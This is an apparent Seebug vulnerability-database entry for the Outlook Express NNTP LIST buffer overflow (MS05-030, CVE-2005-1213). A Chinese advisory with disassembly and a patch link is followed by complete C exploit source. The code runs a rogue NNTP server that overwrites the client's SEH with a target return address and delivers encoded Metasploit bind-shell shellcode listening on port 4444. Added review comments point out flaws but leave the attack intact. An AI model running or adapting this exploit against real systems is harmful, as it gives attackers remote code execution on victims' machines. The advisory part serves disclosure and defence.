MS Outlook Express NNTP Buffer Overflow Exploit (MS05-030)

2005-06-24T00:00:00
ID SSV:13664
Type seebug
Reporter Root
Modified 2005-06-24T00:00:00

Description

<p><strong>漏洞描述:</strong></p><p>Microsoft Outlook Express是Microsoft Windows操作系统捆绑的邮件和新闻组客户端。</p><p>Microsoft Outlook Express的新闻阅读功能中存在远程缓冲区溢出漏洞,可能允许攻击者以当前用户的权限执行任意代码。具体地说,在发布LIST命令后解析NNTP服务器响应时会触发这个漏洞。MSOE.dll(位于C:\Program Files\Outlook Express\MSOE.DLL)中的一个例程中存在栈溢出。以下地址和偏移基于Microsoft Windows 2000 SP4捆绑的MSOE.DLL 5.50.4927.1200版本。在解析以下形式的服务器响应时:alt.12hr 0<LONG STRING>000001325 0000001322 y FIELD1 FIELD2 FIELD3 FIELD4 TERMINATOR,用到了多个字符串解析循环,它们调用CharNext()和IsSpace()例程来判断由空白字符所界定的各字段的长度,然后由StrCpy()将FIELD2拷贝到静态的16字节栈缓冲区:</p><p>SUB_6AED247A() ... </p><p>6AED268B mov eax, ebx ; eax = start of FIELD2 </p><p>6AED268D lea edi, [ebp+buff] ; edi = stack variable </p><p>6AED2690 sub eax, esi ; esi = end of FIELD2 </p><p>6AED2692 mov ecx, eax ; ecx = length of FIELD2 </p><p>6AED2694 mov edx, ecx ; edx = length of FIELD2 </p><p>6AED2696 shr ecx, 2 </p><p>6AED2699 rep movsd ; *** overflow occurs here </p><p>6AED269B mov ecx, edx </p><p>6AED269D and ecx, 3 </p><p>6AED26A0 rep movsb ; copy remaining bytes </p><p>6AED26A2 and byte ptr [ebp+eax+buff], 0 ; null terminate the string</p><p>然后将拷贝的缓冲区传送给例程StrToIntA()。位于0x6AED2699的rep movsd指令可以导致栈溢出。攻击者可以覆盖栈存储的SEH来改变执行流,最终导致执行任意代码。</p><p><strong>漏洞影响:</strong></p><p>受影响的软件:</p><p> •Microsoft Windows 2000 Service Pack 3 和 Microsoft Windows 2000 Service Pack 4</p><p>•Microsoft Windows XP Service Pack 1</p><p>•Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium):</p><p>•Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)</p><p>•Microsoft Windows Server 2003(用于基于 Itanium 的系统)</p><p>•Microsoft Windows Server 2003</p><p>•Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE)、Microsoft Windows Millennium Edition (ME) </p><p>受影响的组件:</p><p> •在 Microsoft Windows 2000 Service Pack 3 和 Microsoft Windows 2000 Service Pack 4 上的 Outlook Express 5.5 Service Pack 2</p><p>•在 Microsoft Windows 2000 Service Pack 3、Microsoft Windows 2000 Service Pack 4 或 Microsoft Windows XP Service Pack 1 上的 Outlook Express 6 Service Pack 1</p><p>•用于 Microsoft Windows 
XP 64-Bit Edition Service Pack 1 (Itanium) 的 Outlook Express 6 Service Pack 1</p><p>•用于 Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium) 的 Outlook Express 6 </p><p>•用于 Microsoft Windows Server 2003(用于基于 Itanium 的系统)的 Outlook Express 6 </p><p>•用于 Microsoft Windows Server 2003 的 Outlook Express 6 </p><p>不受影响的软件:</p><p> •Microsoft Windows Server 2003 Service Pack 1</p><p>•Microsoft Windows Server 2003 with SP1(用于基于 Itanium 的系统)</p><p>•Microsoft Windows Server 2003 x64 Edition</p><p>•Microsoft Windows XP Professional x64 Edition</p><p>•Microsoft Windows XP Service Pack 2</p><p> </p><p><strong>CVE-ID:</strong>CVE-2005-1213 </p><p> </p><p><strong>CNNVD-ID:</strong>CNNVD-200506-126</p><p> </p><p><strong>CNVD-ID:</strong>CNVD-2005-2133 </p><p> </p><p><strong>解决方案:</strong></p><p>Microsoft</p><p> ---------</p><p> Microsoft已经为此发布了一个安全公告(MS05-030)以及相应补丁:MS05-030:Cumulative Security Update in Outlook Express (897715)链接:<a href="http://www.microsoft.com/technet/security/Bulletin/MS05-030.mspx" rel="nofollow">http://www.microsoft.com/technet/security/Bulletin/MS05-030.mspx</a></p>

                                        
                                            
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib,"ws2_32")

/* win32_bind - EXITFUNC=process LPORT=4444 Size=344 
Encoder=PexFnstenvSub http://metasploit.com */
/*
 * Opaque machine-code payload that main() appends to the crafted LIST
 * response with strcat(). The generator comment above is the only
 * description of its contents available in this file (a Metasploit
 * "win32_bind" stub, LPORT=4444, 344 bytes, PexFnstenvSub-encoded);
 * nothing here inspects or verifies those bytes.
 *
 * Because it is handled as a C string (strcat()/strlen() in main()),
 * the blob must not contain an embedded NUL byte: anything after a NUL
 * would be silently dropped from the sent response.
 */
unsigned char scode[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x96"
"\x27\xc8\x3e\x83\xeb\xfc\xe2\xf4\x6a\x4d\x23\x73\x7e\xde\x37\xc1"
"\x69\x47\x43\x52\xb2\x03\x43\x7b\xaa\xac\xb4\x3b\xee\x26\x27\xb5"
"\xd9\x3f\x43\x61\xb6\x26\x23\x77\x1d\x13\x43\x3f\x78\x16\x08\xa7"
"\x3a\xa3\x08\x4a\x91\xe6\x02\x33\x97\xe5\x23\xca\xad\x73\xec\x16"
"\xe3\xc2\x43\x61\xb2\x26\x23\x58\x1d\x2b\x83\xb5\xc9\x3b\xc9\xd5"
"\x95\x0b\x43\xb7\xfa\x03\xd4\x5f\x55\x16\x13\x5a\x1d\x64\xf8\xb5"
"\xd6\x2b\x43\x4e\x8a\x8a\x43\x7e\x9e\x79\xa0\xb0\xd8\x29\x24\x6e"
"\x69\xf1\xae\x6d\xf0\x4f\xfb\x0c\xfe\x50\xbb\x0c\xc9\x73\x37\xee"
"\xfe\xec\x25\xc2\xad\x77\x37\xe8\xc9\xae\x2d\x58\x17\xca\xc0\x3c"
"\xc3\x4d\xca\xc1\x46\x4f\x11\x37\x63\x8a\x9f\xc1\x40\x74\x9b\x6d"
"\xc5\x74\x8b\x6d\xd5\x74\x37\xee\xf0\x4f\xd9\x62\xf0\x74\x41\xdf"
"\x03\x4f\x6c\x24\xe6\xe0\x9f\xc1\x40\x4d\xd8\x6f\xc3\xd8\x18\x56"
"\x32\x8a\xe6\xd7\xc1\xd8\x1e\x6d\xc3\xd8\x18\x56\x73\x6e\x4e\x77"
"\xc1\xd8\x1e\x6e\xc2\x73\x9d\xc1\x46\xb4\xa0\xd9\xef\xe1\xb1\x69"
"\x69\xf1\x9d\xc1\x46\x41\xa2\x5a\xf0\x4f\xab\x53\x1f\xc2\xa2\x6e"
"\xcf\x0e\x04\xb7\x71\x4d\x8c\xb7\x74\x16\x08\xcd\x3c\xd9\x8a\x13"
"\x68\x65\xe4\xad\x1b\x5d\xf0\x95\x3d\x8c\xa0\x4c\x68\x94\xde\xc1"
"\xe3\x63\x37\xe8\xcd\x70\x9a\x6f\xc7\x76\xa2\x3f\xc7\x76\x9d\x6f"
"\x69\xf7\xa0\x93\x4f\x22\x06\x6d\x69\xf1\xa2\xc1\x69\x10\x37\xee"
"\x1d\x70\x34\xbd\x52\x43\x37\xe8\xc4\xd8\x18\x56\xe8\xff\x2a\x4d"
"\xc5\xd8\x1e\xc1\x46\x27\xc8\x3e";

/*
 * Table of supported victim builds. Each entry pairs the 32-bit value that
 * main() copies into bytes 4..7 of its 8-byte repeat unit (dwJMPEBX) with
 * the label usage() prints for it (szDescription). One entry so far.
 *
 * `v` is a second, otherwise unused object of the same element type:
 * usage() sizes the table with sizeof(v), so it must stay declared here.
 */
struct target_entry
{
    DWORD dwJMPEBX;       /* per-target address written into the repeat unit */
    char *szDescription;  /* human-readable label shown by usage() */
} targets[] =
{
    { 0x7803382b, "win2k sp4 all language" },
}, v;

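/*
 * Print command-line help to stdout: the usage line, then one
 * "index<TAB>description" row per entry of targets[].
 *
 * p - program name (normally argv[0]); must be a valid C string.
 * Writes to stdout only; no return value.
 */
void usage(char *p)
{
    size_t i;
    printf("Usage: %s <type>\n"
           "[type]\n", p);
    /* Size the table from its own element type instead of the unrelated
       dummy object `v`, and loop with size_t so the comparison against a
       sizeof expression is not signed/unsigned. The cast keeps the printed
       output identical to the original "%d" row format. */
    for (i = 0; i < sizeof targets / sizeof targets[0]; i++)
    {
        printf("%d\t%s\n", (int)i, targets[i].szDescription);
    }
}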

/*
 * Listener that plays the NNTP server side of the exchange for the
 * targets[] entry selected by argv[1]: accept a client on TCP/119, answer
 * its first two commands with "200\r\n", then send one oversized LIST
 * response assembled from a repeated 8-byte unit, scode and the
 * "\r\n.\r\n" terminator. Loops over connections forever.
 *
 * NOTE(review): `void main` is non-standard; the portable form is
 * `int main` returning 0 on success and non-zero on the error paths.
 */
void main(int argc, char **argv)
{
    struct sockaddr_in server,client;
    WSADATA wsd;
    SOCKET s2,s3;
    int ret;
    char szRecvBuff[0x100];
    char szSend[] = "200\r\n";          /* generic positive reply reused for every client command */
    int i,iType;
    char szEvil[0x3000], szTmp[0x10];   /* szTmp: one 8-byte repeat unit; szEvil: the whole response */

    printf( "MS OE NNTP \"LIST\" Buffer Overflow (MS05-030) EXP\n"
    "Credits: Bug found by iDEFENSE\n"
    "coded by eyas < eyas at xfocus.org>\n"
    "http://www.xfocus.net\n\n");

    if(argc!=2)
    {
        usage(argv[0]);
        return;
    }

    /* NOTE(review): no range check against sizeof targets / sizeof targets[0]
       and atoi() reports no parse error, so an out-of-range or non-numeric
       argument indexes past the table at the memcpy() below; strtol() with
       an endptr plus a bounds test would close both gaps. */
    iType = atoi(argv[1]);


    if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
    {
        printf("[-] WSAStartup error:%d\n", WSAGetLastError());
        return;
    }
    /* NOTE(review): the results of socket(), bind() and listen() are stored
       or discarded but never tested; a failed bind (port 119 already in use
       or not permitted) only shows up as accept() failing inside the loop. */
    s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    server.sin_family = AF_INET;
    server.sin_port = htons(119);       /* standard NNTP port */
    server.sin_addr.s_addr= 0;          /* 0 == INADDR_ANY: every local interface */
    ret = bind(s2, (struct sockaddr *)&server, sizeof(server));
    ret = listen(s2, 100);
    printf("[+] Listen on TCP 119.\n");
    /* Accept loop with no exit path, so the WSACleanup() after it is unreachable. */
    while(1)
    {
        ret=sizeof(client);
        s3 = accept(s2, (struct sockaddr *)&client, &ret);   /* NOTE(review): INVALID_SOCKET is not checked */
        printf("[+] Connection accepted from %s:%d\n", 
        inet_ntoa(client.sin_addr), ntohs(client.sin_port));

        printf("[+] Send welcome information.\n");
        send(s3, szSend, strlen(szSend), 0);   /* greeting; send() results are ignored throughout */

        /* NOTE(review): ret is used as an index without being checked. recv()
           returning 0 (peer closed) or SOCKET_ERROR (-1) makes ret-1 negative
           and the store below lands outside szRecvBuff. The same applies to
           ret-4 further down, which additionally needs ret >= 4. */
        ret = recv(s3, szRecvBuff, sizeof(szRecvBuff), 0);
        szRecvBuff[ret-1] = '\x0';   /* drops the last received byte (the line terminator) before logging */
        printf("[+] Recv: [%s]\n", szRecvBuff);
        send(s3, szSend, strlen(szSend), 0);
        printf("[+] Send response.\n");

        ret = recv(s3, szRecvBuff, sizeof(szRecvBuff), 0);
        szRecvBuff[ret-4] = '\x0';   /* presumably trims "\r\n" plus two more bytes of the second command — confirm against the client */
        printf("[+] Recv: [%s]\n", szRecvBuff);
        printf("[+] send evil buff.\n");

        /* Repeat unit: 4 fixed bytes, then the selected target's 32-bit value
           in native byte order; NUL-terminated so strcat() can append it. */
        strcpy(szTmp, "\xEB\x06\xEB\x06");
        memcpy(&szTmp[4], &(targets[iType].dwJMPEBX),4);
        szTmp[8]='\x0';
        strcpy(szEvil, "215 list\r\ngroup aaaa");
        /* (0x2598+0x200)/8 = 1267 iterations of 8 bytes = 0x2798 bytes. With the
           20-byte prefix, scode (344 bytes per its generator comment, assuming no
           embedded NUL) and the 9-byte trailer this stays below sizeof szEvil
           (0x3000); nothing verifies that at runtime. */
        for(i=0;i<0x2598+0x200;i+=8)
        strcat(szEvil, szTmp);
        strcat(szEvil, (char *)scode);
        strcat(szEvil, " 1 y\r\n.\r\n");   /* rest of the group line, then the NNTP multi-line terminator */
        send(s3, szEvil, strlen(szEvil), 0);
        Sleep(1000);                         /* give the peer time to read before the socket is closed */
        closesocket(s3);
        printf("[+] close connection\n");
    }

    WSACleanup();   /* unreachable: the loop above never exits */
    return;
}

// sebug.net